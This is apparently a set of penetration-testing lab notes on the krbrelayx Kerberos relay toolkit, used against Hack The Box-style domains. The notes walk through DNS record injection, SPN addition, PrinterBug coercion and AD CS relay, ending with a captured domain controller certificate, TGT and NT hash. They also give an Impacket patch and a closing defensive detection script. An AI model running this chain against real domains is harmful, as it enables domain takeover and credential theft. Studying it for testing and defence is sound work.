krbrelayx
GitHub - dirkjanm/krbrelayx: Kerberos relaying and unconstrained delegation abuse toolkit
KrbRelayX is a toolkit for relaying authentication over the Kerberos protocol, developed by security researcher @_dirkjan. It addresses the limitations of classic NTLM relay when faced with enforced signing, channel binding, or protections against self-relay.
Related article: https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
Commonly used in unconstrained delegation attacks.
git clone https://github.com/dirkjanm/krbrelayx
# Add a DNS record
dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69
bloodyAD -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -k --host DC-01.darkcorp.htb add dnsRecord DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86 [--forest]
# Add the SPN (--additional may be needed on a second run)
addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl
# Coerce authentication
printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d 'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
# Start the listener
krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
Related commands
# Check name resolution
nslookup hack.delegate.vl dc1.delegate.vl
# Create a computer account
impacket-addcomputer 'delegate.vl/N.Thompson:KALEB_2341' -computer-name hack -computer-pass Admin123 -dc-ip 10.129.234.69
ESC8:
# Add a DNS record whose name carries the serialized SPN
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
# Kerberos relay listener
krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
# Trigger coerced authentication
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
# Obtain a TGT
certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
This may fail with the following error:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 90
Exception in thread Thread-5:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
Use the following command instead (pins a pyOpenSSL release that still ships crypto.PKCS12):
uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
Or modify Impacket's generate_pfx in adcsattack.py. The original version depends on crypto.PKCS12, which was removed from newer pyOpenSSL releases:
def generate_pfx(self, key, certificate):
    certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
    p12 = crypto.PKCS12()
    p12.set_certificate(certificate)
    p12.set_privatekey(key)
    return p12.export()
#========= change it to the following, which builds the PKCS#12 with cryptography instead =================
def generate_pfx(self, key, certificate):
    from cryptography.hazmat.primitives import serialization
    from cryptography.hazmat.primitives.serialization import pkcs12
    # Load the PEM certificate with pyOpenSSL, then convert it to a cryptography object
    cert_pem = certificate.encode() if isinstance(certificate, str) else certificate
    cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)
    cryptography_cert = cert_obj.to_cryptography()
    # Convert the pyOpenSSL private key to a cryptography object via PEM
    key_pem = crypto.dump_privatekey(crypto.FILETYPE_PEM, key)
    cryptography_key = serialization.load_pem_private_key(key_pem, password=None)
    # Serialize key and certificate into unencrypted PKCS#12 (.pfx) data
    p12_data = pkcs12.serialize_key_and_certificates(
        name=b"",
        key=cryptography_key,
        cert=cryptography_cert,
        cas=None,
        encryption_algorithm=serialization.NoEncryption()
    )
    return p12_data
1. Example run
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
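Added example (not part of the krbrelayx project or of the original notes): a stdlib-only checker that flags AD-integrated DNS A records shaped like the ones created above, an existing host name followed by a base64 blob, which is how a defender reviewing a dump of the zone's dnsNode objects can spot them. The DnsRecord fields, the sample zone and the host inventory are constructed for the demo; the marker string is copied from the record names on this page and is only matched, not interpreted.

```python
import base64
import re
from dataclasses import dataclass

# Constant suffix seen in the record names on this page; matched only, not decoded.
KNOWN_MARKER = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
NETBIOS_MAX = 15  # a real computer-name label never exceeds 15 characters


@dataclass
class DnsRecord:
    name: str    # record label as stored in the zone (dnsNode name)
    rtype: str
    value: str
    owner: str   # principal that created the dnsNode (hypothetical field for the demo)


def looks_like_base64(blob: str) -> bool:
    """True if blob is well-formed base64 encoding at least 18 bytes."""
    if len(blob) < 24 or len(blob) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", blob):
        return False
    try:
        base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True


def suspicious_records(zone, known_hosts):
    """Return (record, reason) pairs that deserve triage."""
    hits = []
    for rec in zone:
        if rec.rtype != "A":
            continue
        if KNOWN_MARKER in rec.name:
            hits.append((rec, f"known relay marker, created by {rec.owner}"))
            continue
        for host in known_hosts:
            tail = rec.name[len(host):]
            if (rec.name.upper().startswith(host.upper())
                    and len(rec.name) > NETBIOS_MAX and looks_like_base64(tail)):
                hits.append((rec, f"host {host} plus base64 suffix, created by {rec.owner}"))
                break
    return hits


# Constructed sample zone: a legitimate DC record, two relay-style records, one benign alias.
SAMPLE_ZONE = [
    DnsRecord("DC-JPQ225", "A", "10.129.234.48", "DC-JPQ225$"),
    DnsRecord("DC-JPQ225" + KNOWN_MARKER, "A", "10.10.14.86", "rosie.powell"),
    DnsRecord("WEB-01" + "A" * 32, "A", "10.10.14.86", "victor.r"),
    DnsRecord("DC-JPQ225-old", "A", "10.129.234.49", "DC-JPQ225$"),
]
KNOWN_HOSTS = ["DC-JPQ225", "WEB-01"]

if __name__ == "__main__":
    for rec, reason in suspicious_records(SAMPLE_ZONE, KNOWN_HOSTS):
        print(f"{rec.name} -> {rec.value}: {reason}")
```

In a real review, feed it the dnsNode names from the domain's DNS zone (for example from an LDAP export) and the computer names from the directory; a record created by a user principal rather than the host itself is the strongest triage signal.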